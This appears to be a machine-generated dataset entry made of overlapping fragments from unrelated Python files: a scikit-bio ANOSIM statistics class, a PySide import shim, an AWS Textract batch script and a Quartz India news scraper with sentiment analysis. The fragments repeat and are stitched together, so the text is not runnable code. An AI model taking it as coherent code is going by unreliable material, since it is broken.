method='average') def _run(self, grouping): \"\"\"Compute ANOSIM R statistic (between -1 and", "calculate an R statistic, which ranges between -1 (anti-grouping) to +1 (strong grouping),", "the original ANOSIM reference. The general algorithm and interface are similar to ``vegan::anosim``,", "strings). grouping_matrix = np.equal.outer(grouping, grouping) # Extract upper triangle from the grouping matrix.", "of ecology 18.1 (1993): 117-143. .. [2] http://cran.r-project.org/web/packages/vegan/index.html \"\"\" short_method_name = 'ANOSIM' long_method_name", "or more groups of objects are significantly different based on a categorical factor.", "division, print_function import numpy as np from scipy.stats import rankdata from ._base import", "References ---------- .. [1] <NAME>. \"Non-parametric multivariate analyses of changes in community structure.\"", "in the same # group. This ufunc requires that grouping is a numeric", "for the original ANOSIM reference. The general algorithm and interface are similar to", "This ufunc requires that grouping is a numeric vector (e.g., # it won't", "vector (e.g., # it won't work with a grouping vector of strings). grouping_matrix", "is in the file COPYING.txt, distributed with this software. # ---------------------------------------------------------------------------- from __future__", "= 'ANOSIM' long_method_name = 'Analysis of Similarities' test_statistic_name = 'R statistic' def __init__(self,", "(excluding the diagonal) preserves this order. grouping_tri = grouping_matrix[self._tri_idxs] return self._compute_r_stat(grouping_tri) def _compute_r_stat(self,", "It is important to # extract the values in the same order that", "a numeric vector (e.g., # it won't work with a grouping vector of", "work with a grouping vector of strings). grouping_matrix = np.equal.outer(grouping, grouping) # Extract", "to # extract the values in the same order that the distances are", "'ANOSIM' long_method_name = 'Analysis of Similarities' test_statistic_name = 'R statistic' def __init__(self, distance_matrix,", "grouping_matrix[self._tri_idxs] return self._compute_r_stat(grouping_tri) def _compute_r_stat(self, grouping_tri): # within r_W = np.mean(self._ranked_dists[grouping_tri]) # between", "class ANOSIM(CategoricalStats): \"\"\"ANOSIM statistical method executor. Analysis of Similarities (ANOSIM) is a non-parametric", "Copyright (c) 2013--, scikit-bio development team. # # Distributed under the terms of", "Similarities' test_statistic_name = 'R statistic' def __init__(self, distance_matrix, grouping, column=None): super(ANOSIM, self).__init__(distance_matrix, grouping,", "this software. # ---------------------------------------------------------------------------- from __future__ import absolute_import, division, print_function import numpy as", "grouping vector of strings). grouping_matrix = np.equal.outer(grouping, grouping) # Extract upper triangle from", "order. grouping_tri = grouping_matrix[self._tri_idxs] return self._compute_r_stat(grouping_tri) def _compute_r_stat(self, grouping_tri): # within r_W =", "(ANOSIM) is a non-parametric method that tests whether two or more groups of", "/ 4) self._ranked_dists = rankdata(self._dm.condensed_form(), method='average') def _run(self, grouping): \"\"\"Compute ANOSIM R statistic", "a matrix where True means that the two objects are in the same", "from the distance matrix (see self._ranked_dists). Extracting the # upper triangle (excluding the", "a grouping vector of strings). grouping_matrix = np.equal.outer(grouping, grouping) # Extract upper triangle", "print_function import numpy as np from scipy.stats import rankdata from ._base import CategoricalStats", "grouping, column=column) self._divisor = self._dm.shape[0] * ((self._dm.shape[0] - 1) / 4) self._ranked_dists =", "the file COPYING.txt, distributed with this software. # ---------------------------------------------------------------------------- from __future__ import absolute_import,", "R value of 0 indicating random grouping. Notes ----- See [1]_ for the", "structure.\" Australian journal of ecology 18.1 (1993): 117-143. .. [2] http://cran.r-project.org/web/packages/vegan/index.html \"\"\" short_method_name", "self._dm.shape[0] * ((self._dm.shape[0] - 1) / 4) self._ranked_dists = rankdata(self._dm.condensed_form(), method='average') def _run(self,", "#! /usr/bin/env python # ---------------------------------------------------------------------------- # Copyright (c) 2013--, scikit-bio development team. #", "the same order that the distances are extracted # from the distance matrix", "grouping_matrix = np.equal.outer(grouping, grouping) # Extract upper triangle from the grouping matrix. It", "ANOSIM(CategoricalStats): \"\"\"ANOSIM statistical method executor. Analysis of Similarities (ANOSIM) is a non-parametric method", "matrix (see self._ranked_dists). Extracting the # upper triangle (excluding the diagonal) preserves this", "long_method_name = 'Analysis of Similarities' test_statistic_name = 'R statistic' def __init__(self, distance_matrix, grouping,", "it won't work with a grouping vector of strings). grouping_matrix = np.equal.outer(grouping, grouping)", "vector of strings). grouping_matrix = np.equal.outer(grouping, grouping) # Extract upper triangle from the", "of Similarities (ANOSIM) is a non-parametric method that tests whether two or more", "as np from scipy.stats import rankdata from ._base import CategoricalStats class ANOSIM(CategoricalStats): \"\"\"ANOSIM", "r_W = np.mean(self._ranked_dists[grouping_tri]) # between r_B = np.mean(self._ranked_dists[np.invert(grouping_tri)]) return (r_B - r_W) /", "journal of ecology 18.1 (1993): 117-143. .. [2] http://cran.r-project.org/web/packages/vegan/index.html \"\"\" short_method_name = 'ANOSIM'", "[1] <NAME>. \"Non-parametric multivariate analyses of changes in community structure.\" Australian journal of", "# # The full license is in the file COPYING.txt, distributed with this", "a categorical factor. The ranks of the distances in the distance matrix are", "of Similarities' test_statistic_name = 'R statistic' def __init__(self, distance_matrix, grouping, column=None): super(ANOSIM, self).__init__(distance_matrix,", "software. # ---------------------------------------------------------------------------- from __future__ import absolute_import, division, print_function import numpy as np", "method that tests whether two or more groups of objects are significantly different", "(e.g., # it won't work with a grouping vector of strings). grouping_matrix =", "of objects are significantly different based on a categorical factor. The ranks of", "distances in the distance matrix are used to calculate an R statistic, which", "the distance matrix (see self._ranked_dists). Extracting the # upper triangle (excluding the diagonal)", "(between -1 and +1).\"\"\" # Create a matrix where True means that the", "requires that grouping is a numeric vector (e.g., # it won't work with", "multivariate analyses of changes in community structure.\" Australian journal of ecology 18.1 (1993):", "# Extract upper triangle from the grouping matrix. It is important to #", "-1 (anti-grouping) to +1 (strong grouping), with an R value of 0 indicating", "matrix. It is important to # extract the values in the same order", "ranks of the distances in the distance matrix are used to calculate an", "grouping, column=None): super(ANOSIM, self).__init__(distance_matrix, grouping, column=column) self._divisor = self._dm.shape[0] * ((self._dm.shape[0] - 1)", "117-143. .. [2] http://cran.r-project.org/web/packages/vegan/index.html \"\"\" short_method_name = 'ANOSIM' long_method_name = 'Analysis of Similarities'", "# The full license is in the file COPYING.txt, distributed with this software.", "\"\"\" short_method_name = 'ANOSIM' long_method_name = 'Analysis of Similarities' test_statistic_name = 'R statistic'", "ranges between -1 (anti-grouping) to +1 (strong grouping), with an R value of", "grouping): \"\"\"Compute ANOSIM R statistic (between -1 and +1).\"\"\" # Create a matrix" ]
[]
[ "supports PySide2 and 6 but needs to adapt to whats already imported NOT", "<reponame>ewerybody/siding<gh_stars>0 \"\"\" singlesiding supports PySide2 and 6 but needs to adapt to whats", "in sys.modules: from PySide2 import QtCore, QtWidgets, QtNetwork else: try: from PySide6 import", "PySide2 import QtCore, QtWidgets, QtNetwork else: try: from PySide6 import QtCore, QtWidgets, QtNetwork", "adapt to whats already imported NOT whats available! Thus we deal with it", "from PySide6 import QtCore, QtWidgets, QtNetwork elif 'PySide2' in sys.modules: from PySide2 import", "sys.modules: from PySide6 import QtCore, QtWidgets, QtNetwork elif 'PySide2' in sys.modules: from PySide2", "deal with it here. \"\"\" import sys if 'PySide6' in sys.modules: from PySide6", "from PySide2 import QtCore, QtWidgets, QtNetwork else: try: from PySide6 import QtCore, QtWidgets,", "and 6 but needs to adapt to whats already imported NOT whats available!", "sys.modules: from PySide2 import QtCore, QtWidgets, QtNetwork else: try: from PySide6 import QtCore,", "it here. \"\"\" import sys if 'PySide6' in sys.modules: from PySide6 import QtCore,", "'PySide6' in sys.modules: from PySide6 import QtCore, QtWidgets, QtNetwork elif 'PySide2' in sys.modules:", "try: from PySide6 import QtCore, QtWidgets, QtNetwork except ImportError: from PySide2 import QtCore,", "else: try: from PySide6 import QtCore, QtWidgets, QtNetwork except ImportError: from PySide2 import", "if 'PySide6' in sys.modules: from PySide6 import QtCore, QtWidgets, QtNetwork elif 'PySide2' in", "PySide6 import QtCore, QtWidgets, QtNetwork elif 'PySide2' in sys.modules: from PySide2 import QtCore,", "Thus we deal with it here. \"\"\" import sys if 'PySide6' in sys.modules:", "'PySide2' in sys.modules: from PySide2 import QtCore, QtWidgets, QtNetwork else: try: from PySide6", "QtCore, QtWidgets, QtNetwork else: try: from PySide6 import QtCore, QtWidgets, QtNetwork except ImportError:", "6 but needs to adapt to whats already imported NOT whats available! Thus", "elif 'PySide2' in sys.modules: from PySide2 import QtCore, QtWidgets, QtNetwork else: try: from", "import sys if 'PySide6' in sys.modules: from PySide6 import QtCore, QtWidgets, QtNetwork elif", "but needs to adapt to whats already imported NOT whats available! Thus we", "imported NOT whats available! Thus we deal with it here. \"\"\" import sys", "already imported NOT whats available! Thus we deal with it here. \"\"\" import", "sys if 'PySide6' in sys.modules: from PySide6 import QtCore, QtWidgets, QtNetwork elif 'PySide2'", "to adapt to whats already imported NOT whats available! Thus we deal with", "whats available! Thus we deal with it here. \"\"\" import sys if 'PySide6'", "available! Thus we deal with it here. \"\"\" import sys if 'PySide6' in", "\"\"\" singlesiding supports PySide2 and 6 but needs to adapt to whats already", "needs to adapt to whats already imported NOT whats available! Thus we deal", "with it here. \"\"\" import sys if 'PySide6' in sys.modules: from PySide6 import", "here. \"\"\" import sys if 'PySide6' in sys.modules: from PySide6 import QtCore, QtWidgets,", "import QtCore, QtWidgets, QtNetwork elif 'PySide2' in sys.modules: from PySide2 import QtCore, QtWidgets,", "whats already imported NOT whats available! Thus we deal with it here. \"\"\"", "QtNetwork elif 'PySide2' in sys.modules: from PySide2 import QtCore, QtWidgets, QtNetwork else: try:", "import QtCore, QtWidgets, QtNetwork else: try: from PySide6 import QtCore, QtWidgets, QtNetwork except", "QtNetwork else: try: from PySide6 import QtCore, QtWidgets, QtNetwork except ImportError: from PySide2", "QtWidgets, QtNetwork elif 'PySide2' in sys.modules: from PySide2 import QtCore, QtWidgets, QtNetwork else:", "\"\"\" import sys if 'PySide6' in sys.modules: from PySide6 import QtCore, QtWidgets, QtNetwork", "QtWidgets, QtNetwork else: try: from PySide6 import QtCore, QtWidgets, QtNetwork except ImportError: from", "singlesiding supports PySide2 and 6 but needs to adapt to whats already imported", "from PySide6 import QtCore, QtWidgets, QtNetwork except ImportError: from PySide2 import QtCore, QtWidgets,", "PySide2 and 6 but needs to adapt to whats already imported NOT whats", "PySide6 import QtCore, QtWidgets, QtNetwork except ImportError: from PySide2 import QtCore, QtWidgets, QtNetwork", "we deal with it here. \"\"\" import sys if 'PySide6' in sys.modules: from", "NOT whats available! Thus we deal with it here. \"\"\" import sys if", "to whats already imported NOT whats available! Thus we deal with it here.", "in sys.modules: from PySide6 import QtCore, QtWidgets, QtNetwork elif 'PySide2' in sys.modules: from", "QtCore, QtWidgets, QtNetwork elif 'PySide2' in sys.modules: from PySide2 import QtCore, QtWidgets, QtNetwork" ]
[ "main(direc): direc_list = get_direc(direc) for file in direc_list: file_code = file.split('/')[-1].split('.')[0] table_csv =", "all files under the directory\"\"\" path = os.path.join(direc, direc+'png', '*png') direc_list = glob.glob(path)", "directory\"\"\" path = os.path.join(direc, direc+'png', '*png') direc_list = glob.glob(path) return direc_list def main(direc):", "fout.write(table_csv) print('output file saved: ', output_file) if __name__ == \"__main__\": direc = sys.argv[1]", "path = os.path.join(direc, direc+'png', '*png') direc_list = glob.glob(path) return direc_list def main(direc): direc_list", "import glob import sys import textract_python_table_parser as tptp ''' File name: testract_all.py Author:", "tptp ''' File name: testract_all.py Author: <NAME> Date created: 12/08/2021 Python Version: 3.9", "-*- import pandas as pd import os import time import glob import sys", "python # -*- coding: utf-8 -*- import pandas as pd import os import", "for file in direc_list: file_code = file.split('/')[-1].split('.')[0] table_csv = tptp.get_table_csv_results(file) direc_new = direc", "''' File name: testract_all.py Author: <NAME> Date created: 12/08/2021 Python Version: 3.9 '''", "with open(output_file, \"wt\") as fout: fout.write(table_csv) print('output file saved: ', output_file) if __name__", "import os import time import glob import sys import textract_python_table_parser as tptp '''", "file_code = file.split('/')[-1].split('.')[0] table_csv = tptp.get_table_csv_results(file) direc_new = direc + 'csv' output_file =", "as tptp ''' File name: testract_all.py Author: <NAME> Date created: 12/08/2021 Python Version:", "coding: utf-8 -*- import pandas as pd import os import time import glob", "the directory #cd /Users/apple/Desktop/research_fellow_documents/process_illinois/ def get_direc(direc): \"\"\"get the lists of all files under", "'*png') direc_list = glob.glob(path) return direc_list def main(direc): direc_list = get_direc(direc) for file", "time import glob import sys import textract_python_table_parser as tptp ''' File name: testract_all.py", "under the directory\"\"\" path = os.path.join(direc, direc+'png', '*png') direc_list = glob.glob(path) return direc_list", "textract_python_table_parser as tptp ''' File name: testract_all.py Author: <NAME> Date created: 12/08/2021 Python", "glob import sys import textract_python_table_parser as tptp ''' File name: testract_all.py Author: <NAME>", "glob.glob(path) return direc_list def main(direc): direc_list = get_direc(direc) for file in direc_list: file_code", "12/08/2021 Python Version: 3.9 ''' #change to the directory #cd /Users/apple/Desktop/research_fellow_documents/process_illinois/ def get_direc(direc):", "direc + 'csv' output_file = '{}/{}/{}.csv'.format(direc, direc_new, file_code) with open(output_file, \"wt\") as fout:", "import time import glob import sys import textract_python_table_parser as tptp ''' File name:", "as pd import os import time import glob import sys import textract_python_table_parser as", "\"wt\") as fout: fout.write(table_csv) print('output file saved: ', output_file) if __name__ == \"__main__\":", "of all files under the directory\"\"\" path = os.path.join(direc, direc+'png', '*png') direc_list =", "Author: <NAME> Date created: 12/08/2021 Python Version: 3.9 ''' #change to the directory", "print('output file saved: ', output_file) if __name__ == \"__main__\": direc = sys.argv[1] main(direc)", "Date created: 12/08/2021 Python Version: 3.9 ''' #change to the directory #cd /Users/apple/Desktop/research_fellow_documents/process_illinois/", "= get_direc(direc) for file in direc_list: file_code = file.split('/')[-1].split('.')[0] table_csv = tptp.get_table_csv_results(file) direc_new", "file in direc_list: file_code = file.split('/')[-1].split('.')[0] table_csv = tptp.get_table_csv_results(file) direc_new = direc +", "tptp.get_table_csv_results(file) direc_new = direc + 'csv' output_file = '{}/{}/{}.csv'.format(direc, direc_new, file_code) with open(output_file,", "= glob.glob(path) return direc_list def main(direc): direc_list = get_direc(direc) for file in direc_list:", "file.split('/')[-1].split('.')[0] table_csv = tptp.get_table_csv_results(file) direc_new = direc + 'csv' output_file = '{}/{}/{}.csv'.format(direc, direc_new,", "<gh_stars>0 #!/usr/bin/env python # -*- coding: utf-8 -*- import pandas as pd import", "return direc_list def main(direc): direc_list = get_direc(direc) for file in direc_list: file_code =", "as fout: fout.write(table_csv) print('output file saved: ', output_file) if __name__ == \"__main__\": direc", "table_csv = tptp.get_table_csv_results(file) direc_new = direc + 'csv' output_file = '{}/{}/{}.csv'.format(direc, direc_new, file_code)", "the lists of all files under the directory\"\"\" path = os.path.join(direc, direc+'png', '*png')", "= file.split('/')[-1].split('.')[0] table_csv = tptp.get_table_csv_results(file) direc_new = direc + 'csv' output_file = '{}/{}/{}.csv'.format(direc,", "direc_list: file_code = file.split('/')[-1].split('.')[0] table_csv = tptp.get_table_csv_results(file) direc_new = direc + 'csv' output_file", "= os.path.join(direc, direc+'png', '*png') direc_list = glob.glob(path) return direc_list def main(direc): direc_list =", "File name: testract_all.py Author: <NAME> Date created: 12/08/2021 Python Version: 3.9 ''' #change", "-*- coding: utf-8 -*- import pandas as pd import os import time import", "\"\"\"get the lists of all files under the directory\"\"\" path = os.path.join(direc, direc+'png',", "direc_list = get_direc(direc) for file in direc_list: file_code = file.split('/')[-1].split('.')[0] table_csv = tptp.get_table_csv_results(file)", "name: testract_all.py Author: <NAME> Date created: 12/08/2021 Python Version: 3.9 ''' #change to", "direc_new = direc + 'csv' output_file = '{}/{}/{}.csv'.format(direc, direc_new, file_code) with open(output_file, \"wt\")", "to the directory #cd /Users/apple/Desktop/research_fellow_documents/process_illinois/ def get_direc(direc): \"\"\"get the lists of all files", "Python Version: 3.9 ''' #change to the directory #cd /Users/apple/Desktop/research_fellow_documents/process_illinois/ def get_direc(direc): \"\"\"get", "def main(direc): direc_list = get_direc(direc) for file in direc_list: file_code = file.split('/')[-1].split('.')[0] table_csv", "get_direc(direc) for file in direc_list: file_code = file.split('/')[-1].split('.')[0] table_csv = tptp.get_table_csv_results(file) direc_new =", "direc_new, file_code) with open(output_file, \"wt\") as fout: fout.write(table_csv) print('output file saved: ', output_file)", "direc+'png', '*png') direc_list = glob.glob(path) return direc_list def main(direc): direc_list = get_direc(direc) for", "testract_all.py Author: <NAME> Date created: 12/08/2021 Python Version: 3.9 ''' #change to the", "files under the directory\"\"\" path = os.path.join(direc, direc+'png', '*png') direc_list = glob.glob(path) return", "import textract_python_table_parser as tptp ''' File name: testract_all.py Author: <NAME> Date created: 12/08/2021", "direc_list def main(direc): direc_list = get_direc(direc) for file in direc_list: file_code = file.split('/')[-1].split('.')[0]", "utf-8 -*- import pandas as pd import os import time import glob import", "/Users/apple/Desktop/research_fellow_documents/process_illinois/ def get_direc(direc): \"\"\"get the lists of all files under the directory\"\"\" path", "#!/usr/bin/env python # -*- coding: utf-8 -*- import pandas as pd import os", "#change to the directory #cd /Users/apple/Desktop/research_fellow_documents/process_illinois/ def get_direc(direc): \"\"\"get the lists of all", "<NAME> Date created: 12/08/2021 Python Version: 3.9 ''' #change to the directory #cd", "3.9 ''' #change to the directory #cd /Users/apple/Desktop/research_fellow_documents/process_illinois/ def get_direc(direc): \"\"\"get the lists", "pd import os import time import glob import sys import textract_python_table_parser as tptp", "#cd /Users/apple/Desktop/research_fellow_documents/process_illinois/ def get_direc(direc): \"\"\"get the lists of all files under the directory\"\"\"", "def get_direc(direc): \"\"\"get the lists of all files under the directory\"\"\" path =", "os.path.join(direc, direc+'png', '*png') direc_list = glob.glob(path) return direc_list def main(direc): direc_list = get_direc(direc)", "fout: fout.write(table_csv) print('output file saved: ', output_file) if __name__ == \"__main__\": direc =", "'{}/{}/{}.csv'.format(direc, direc_new, file_code) with open(output_file, \"wt\") as fout: fout.write(table_csv) print('output file saved: ',", "directory #cd /Users/apple/Desktop/research_fellow_documents/process_illinois/ def get_direc(direc): \"\"\"get the lists of all files under the", "= tptp.get_table_csv_results(file) direc_new = direc + 'csv' output_file = '{}/{}/{}.csv'.format(direc, direc_new, file_code) with", "sys import textract_python_table_parser as tptp ''' File name: testract_all.py Author: <NAME> Date created:", "open(output_file, \"wt\") as fout: fout.write(table_csv) print('output file saved: ', output_file) if __name__ ==", "Version: 3.9 ''' #change to the directory #cd /Users/apple/Desktop/research_fellow_documents/process_illinois/ def get_direc(direc): \"\"\"get the", "'csv' output_file = '{}/{}/{}.csv'.format(direc, direc_new, file_code) with open(output_file, \"wt\") as fout: fout.write(table_csv) print('output", "the directory\"\"\" path = os.path.join(direc, direc+'png', '*png') direc_list = glob.glob(path) return direc_list def", "in direc_list: file_code = file.split('/')[-1].split('.')[0] table_csv = tptp.get_table_csv_results(file) direc_new = direc + 'csv'", "pandas as pd import os import time import glob import sys import textract_python_table_parser", "os import time import glob import sys import textract_python_table_parser as tptp ''' File", "= '{}/{}/{}.csv'.format(direc, direc_new, file_code) with open(output_file, \"wt\") as fout: fout.write(table_csv) print('output file saved:", "created: 12/08/2021 Python Version: 3.9 ''' #change to the directory #cd /Users/apple/Desktop/research_fellow_documents/process_illinois/ def", "= direc + 'csv' output_file = '{}/{}/{}.csv'.format(direc, direc_new, file_code) with open(output_file, \"wt\") as", "import pandas as pd import os import time import glob import sys import", "+ 'csv' output_file = '{}/{}/{}.csv'.format(direc, direc_new, file_code) with open(output_file, \"wt\") as fout: fout.write(table_csv)", "output_file = '{}/{}/{}.csv'.format(direc, direc_new, file_code) with open(output_file, \"wt\") as fout: fout.write(table_csv) print('output file", "lists of all files under the directory\"\"\" path = os.path.join(direc, direc+'png', '*png') direc_list", "''' #change to the directory #cd /Users/apple/Desktop/research_fellow_documents/process_illinois/ def get_direc(direc): \"\"\"get the lists of", "get_direc(direc): \"\"\"get the lists of all files under the directory\"\"\" path = os.path.join(direc,", "# -*- coding: utf-8 -*- import pandas as pd import os import time", "file_code) with open(output_file, \"wt\") as fout: fout.write(table_csv) print('output file saved: ', output_file) if", "import sys import textract_python_table_parser as tptp ''' File name: testract_all.py Author: <NAME> Date", "direc_list = glob.glob(path) return direc_list def main(direc): direc_list = get_direc(direc) for file in" ]
[]
[ "aname = 'Anonymous' # get article title atitle = soup.find(class_=\"_21349 india none _4ca8e\")", "= link # get page text page = requests.get(url) # parse with BFS", "get the text only text = paragraph.get_text() paragraphtext.append(text) # combine all paragraphs into", "india none _4ca8e\") thetitle = atitle.get_text() # get main article page articlebody =", "'Date'] news = news[cols] afronews = oldnews.append(news) afronews.drop_duplicates(subset='Title', keep='last', inplace=True) afronews.reset_index(inplace=True) afronews.drop(labels='index', axis=1,", "the text for each article paragraphtext = [] # get url url =", "only text = paragraph.get_text() paragraphtext.append(text) # combine all paragraphs into an article thearticle.append(paragraphtext)", "text for each article paragraphtext = [] # get url url = link", "myarticle = [' '.join(article) for article in thearticle] # creating excel file \"Quartz_India\"", "import TextBlob page = requests.get('https://qz.com/india/latest') soup = BeautifulSoup(page.content, 'html.parser') weblinks = soup.find_all('article') pagelinks", "'Date':datetime.now()} oldnews = pd.read_excel('Quartz_India.xlsx') news = pd.DataFrame(data=data) cols = ['Title', 'Author', 'PageLink', 'Article',", "articlebody = soup.find(class_='_61c55') # get text articletext = soup.find_all('p')[8:] # print text for", "for article in thearticle] # creating excel file \"Quartz_India\" df = pd.DataFrame(columns =", "weblinks[5:]: url = link.contents[0].find_all('a')[0] pagelinks.append('http://qz.com'+url.get('href')) authorname = [] title = [] thearticle =", "from selenium import webdriver import time import pandas as pd import numpy as", "on the article data = pd.read_excel(\"Quartz_India.xlsx\") data['Polarity Article'] = data.apply(lambda x: TextBlob(x['Article']).sentiment.polarity, axis=1)", "in articletext[:-1]: # get the text only text = paragraph.get_text() paragraphtext.append(text) # combine", "text articletext = soup.find_all('p')[8:] # print text for paragraph in articletext[:-1]: # get", "= soup.find_all('article') pagelinks = [] for link in weblinks[5:]: url = link.contents[0].find_all('a')[0] pagelinks.append('http://qz.com'+url.get('href'))", "news[cols] afronews = oldnews.append(news) afronews.drop_duplicates(subset='Title', keep='last', inplace=True) afronews.reset_index(inplace=True) afronews.drop(labels='index', axis=1, inplace=True) filename =", "keep='last', inplace=True) afronews.reset_index(inplace=True) afronews.drop(labels='index', axis=1, inplace=True) filename = 'Quartz_India.xlsx' wks_name = 'Data' writer", "[] # get url url = link # get page text page =", "= soup.find(class_=\"_21349 india none _4ca8e\") thetitle = atitle.get_text() # get main article page", "a named author try: abody = soup.find(class_='d3284 india').find('a') aname = abody.get_text() except: aname", "file data = {'Title':title, 'Author':authorname, 'PageLink':pagelinks, 'Article':myarticle, 'Date':datetime.now()} oldnews = pd.read_excel('Quartz_India.xlsx') news =", "article thearticle.append(paragraphtext) authorname.append(aname) title.append(thetitle) # join paragraphs to re-create the article myarticle =", "'Article':myarticle, 'Date':datetime.now()} oldnews = pd.read_excel('Quartz_India.xlsx') news = pd.DataFrame(data=data) cols = ['Title', 'Author', 'PageLink',", "wks_name = 'Data' writer = pd.ExcelWriter(filename) afronews.to_excel(writer, wks_name, index=False) writer.save() # performing sentiment", "time import pandas as pd import numpy as np from datetime import datetime", "= news[cols] afronews = oldnews.append(news) afronews.drop_duplicates(subset='Title', keep='last', inplace=True) afronews.reset_index(inplace=True) afronews.drop(labels='index', axis=1, inplace=True) filename", "in pagelinks: # store the text for each article paragraphtext = [] #", "import webdriver import time import pandas as pd import numpy as np from", "[] thearticle = [] for link in pagelinks: # store the text for", "axis=1, inplace=True) filename = 'Quartz_India.xlsx' wks_name = 'Data' writer = pd.ExcelWriter(filename) afronews.to_excel(writer, wks_name,", "author name, if there's a named author try: abody = soup.find(class_='d3284 india').find('a') aname", "soup.find(class_=\"_21349 india none _4ca8e\") thetitle = atitle.get_text() # get main article page articlebody", "name, if there's a named author try: abody = soup.find(class_='d3284 india').find('a') aname =", "article data = pd.read_excel(\"Quartz_India.xlsx\") data['Polarity Article'] = data.apply(lambda x: TextBlob(x['Article']).sentiment.polarity, axis=1) data.to_excel(\"Sentiment_Analysis.xlsx\",index =", "'Quartz_India.xlsx' wks_name = 'Data' writer = pd.ExcelWriter(filename) afronews.to_excel(writer, wks_name, index=False) writer.save() # performing", "= pd.DataFrame(data=data) cols = ['Title', 'Author', 'PageLink', 'Article', 'Date'] news = news[cols] afronews", "= BeautifulSoup(page.content, 'html.parser') weblinks = soup.find_all('article') pagelinks = [] for link in weblinks[5:]:", "# get the text only text = paragraph.get_text() paragraphtext.append(text) # combine all paragraphs", "pagelinks.append('http://qz.com'+url.get('href')) authorname = [] title = [] thearticle = [] for link in", "df = pd.DataFrame(columns = ['Title', 'Author' , 'PageLink', 'Article', 'Date']) df.to_excel(\"Quartz_India.xlsx\", index =", "index=False) writer.save() # performing sentiment analysis on the article data = pd.read_excel(\"Quartz_India.xlsx\") data['Polarity", "with BFS soup = BeautifulSoup(page.text, 'html.parser') # get author name, if there's a", "paragraphtext.append(text) # combine all paragraphs into an article thearticle.append(paragraphtext) authorname.append(aname) title.append(thetitle) # join", "= False) # save article data to file data = {'Title':title, 'Author':authorname, 'PageLink':pagelinks,", "text = paragraph.get_text() paragraphtext.append(text) # combine all paragraphs into an article thearticle.append(paragraphtext) authorname.append(aname)", "thearticle] # creating excel file \"Quartz_India\" df = pd.DataFrame(columns = ['Title', 'Author' ,", "sentiment analysis on the article data = pd.read_excel(\"Quartz_India.xlsx\") data['Polarity Article'] = data.apply(lambda x:", "{'Title':title, 'Author':authorname, 'PageLink':pagelinks, 'Article':myarticle, 'Date':datetime.now()} oldnews = pd.read_excel('Quartz_India.xlsx') news = pd.DataFrame(data=data) cols =", "webdriver import time import pandas as pd import numpy as np from datetime", "BeautifulSoup from selenium import webdriver import time import pandas as pd import numpy", "except: aname = 'Anonymous' # get article title atitle = soup.find(class_=\"_21349 india none", "if there's a named author try: abody = soup.find(class_='d3284 india').find('a') aname = abody.get_text()", "wks_name, index=False) writer.save() # performing sentiment analysis on the article data = pd.read_excel(\"Quartz_India.xlsx\")", "'Data' writer = pd.ExcelWriter(filename) afronews.to_excel(writer, wks_name, index=False) writer.save() # performing sentiment analysis on", "requests from bs4 import BeautifulSoup from selenium import webdriver import time import pandas", "cols = ['Title', 'Author', 'PageLink', 'Article', 'Date'] news = news[cols] afronews = oldnews.append(news)", "from bs4 import BeautifulSoup from selenium import webdriver import time import pandas as", "there's a named author try: abody = soup.find(class_='d3284 india').find('a') aname = abody.get_text() except:", "link.contents[0].find_all('a')[0] pagelinks.append('http://qz.com'+url.get('href')) authorname = [] title = [] thearticle = [] for link", "article title atitle = soup.find(class_=\"_21349 india none _4ca8e\") thetitle = atitle.get_text() # get", "BFS soup = BeautifulSoup(page.text, 'html.parser') # get author name, if there's a named", "BeautifulSoup(page.content, 'html.parser') weblinks = soup.find_all('article') pagelinks = [] for link in weblinks[5:]: url", "'Article', 'Date']) df.to_excel(\"Quartz_India.xlsx\", index = False) # save article data to file data", "the article data = pd.read_excel(\"Quartz_India.xlsx\") data['Polarity Article'] = data.apply(lambda x: TextBlob(x['Article']).sentiment.polarity, axis=1) data.to_excel(\"Sentiment_Analysis.xlsx\",index", "oldnews.append(news) afronews.drop_duplicates(subset='Title', keep='last', inplace=True) afronews.reset_index(inplace=True) afronews.drop(labels='index', axis=1, inplace=True) filename = 'Quartz_India.xlsx' wks_name =", "= atitle.get_text() # get main article page articlebody = soup.find(class_='_61c55') # get text", "_4ca8e\") thetitle = atitle.get_text() # get main article page articlebody = soup.find(class_='_61c55') #", "\"Quartz_India\" df = pd.DataFrame(columns = ['Title', 'Author' , 'PageLink', 'Article', 'Date']) df.to_excel(\"Quartz_India.xlsx\", index", "pd import numpy as np from datetime import datetime from textblob import TextBlob", "from datetime import datetime from textblob import TextBlob page = requests.get('https://qz.com/india/latest') soup =", "atitle = soup.find(class_=\"_21349 india none _4ca8e\") thetitle = atitle.get_text() # get main article", "= [' '.join(article) for article in thearticle] # creating excel file \"Quartz_India\" df", "news = pd.DataFrame(data=data) cols = ['Title', 'Author', 'PageLink', 'Article', 'Date'] news = news[cols]", "title atitle = soup.find(class_=\"_21349 india none _4ca8e\") thetitle = atitle.get_text() # get main", ", 'PageLink', 'Article', 'Date']) df.to_excel(\"Quartz_India.xlsx\", index = False) # save article data to", "pagelinks = [] for link in weblinks[5:]: url = link.contents[0].find_all('a')[0] pagelinks.append('http://qz.com'+url.get('href')) authorname =", "named author try: abody = soup.find(class_='d3284 india').find('a') aname = abody.get_text() except: aname =", "try: abody = soup.find(class_='d3284 india').find('a') aname = abody.get_text() except: aname = 'Anonymous' #", "an article thearticle.append(paragraphtext) authorname.append(aname) title.append(thetitle) # join paragraphs to re-create the article myarticle", "BeautifulSoup(page.text, 'html.parser') # get author name, if there's a named author try: abody", "[] for link in weblinks[5:]: url = link.contents[0].find_all('a')[0] pagelinks.append('http://qz.com'+url.get('href')) authorname = [] title", "= soup.find(class_='_61c55') # get text articletext = soup.find_all('p')[8:] # print text for paragraph", "the text only text = paragraph.get_text() paragraphtext.append(text) # combine all paragraphs into an", "= soup.find_all('p')[8:] # print text for paragraph in articletext[:-1]: # get the text", "soup.find_all('article') pagelinks = [] for link in weblinks[5:]: url = link.contents[0].find_all('a')[0] pagelinks.append('http://qz.com'+url.get('href')) authorname", "link in weblinks[5:]: url = link.contents[0].find_all('a')[0] pagelinks.append('http://qz.com'+url.get('href')) authorname = [] title = []", "aname = abody.get_text() except: aname = 'Anonymous' # get article title atitle =", "# print text for paragraph in articletext[:-1]: # get the text only text", "['Title', 'Author' , 'PageLink', 'Article', 'Date']) df.to_excel(\"Quartz_India.xlsx\", index = False) # save article", "save article data to file data = {'Title':title, 'Author':authorname, 'PageLink':pagelinks, 'Article':myarticle, 'Date':datetime.now()} oldnews", "get page text page = requests.get(url) # parse with BFS soup = BeautifulSoup(page.text,", "main article page articlebody = soup.find(class_='_61c55') # get text articletext = soup.find_all('p')[8:] #", "link # get page text page = requests.get(url) # parse with BFS soup", "# get author 